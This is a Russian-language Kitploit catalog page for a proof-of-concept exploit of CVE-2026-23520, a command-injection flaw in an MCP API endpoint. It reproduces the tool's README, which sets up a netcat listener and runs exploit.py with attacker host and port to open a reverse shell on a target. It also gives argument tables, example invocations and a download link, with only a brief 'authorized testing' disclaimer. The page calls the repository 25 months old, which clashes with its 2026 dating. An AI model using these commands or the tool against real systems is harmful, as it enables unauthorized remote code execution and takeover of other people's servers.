Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23520 — Доказательство концепции эксплуатации для CVE-2026-23520 — уязвимости внедрения команд в службе обновления Arcane, позволяющей удалённое выполнение кода через специально сформированные API-запросы. | Kitploit
Инструменты/GitHubGitHub/cypher-21/cve-2026-23520
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

Доказательство концепции эксплуатации для CVE-2026-23520 — уязвимости внедрения команд в службе обновления Arcane, позволяющей удалённое выполнение кода через специально сформированные API-запросы.

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23520

MCP API Remote Command Execution (RCE) PoC


📌 Обзор

Этот репозиторий содержит Proof-of-Concept (PoC) эксплойт для уязвимости удалённого выполнения команд (RCE), затрагивающей приложения, которые предоставляют уязвимую конечную точку MCP API (обычно /api/mcp/connect).

Уязвимость позволяет выполнять системные команды через специально сформированный API-запрос.


🚀 Быстрый старт

1. Запустите слушатель

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. Запустите эксплойт

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 Использование

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 Обязательные аргументы

АргументОписание
targetIP-адрес, домен или URL цели
--lhostIP-адрес атакующего
--lportПорт атакующего

🔧 Необязательные аргументы

ФлагОписание
-p, --portПорт цели (по умолчанию: 443)
-s, --schemehttp или https (по умолчанию: https)
-e, --endpointПуть к конечной точке API
-t, --timeoutТаймаут запроса
-v, --verboseОтладочный вывод

🧪 Примеры

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 Примечания

  • Таймаут не обязательно означает неудачу.
  • Убедитесь, что ваш слушатель запущен до начала эксплуатации.
  • Полезная нагрузка предполагает наличие /bin/bash.

⚠️ Отказ от ответственности

Только для авторизованного тестирования и образовательных целей.


👨‍💻 Автор

Parosh B

Скачать инструмент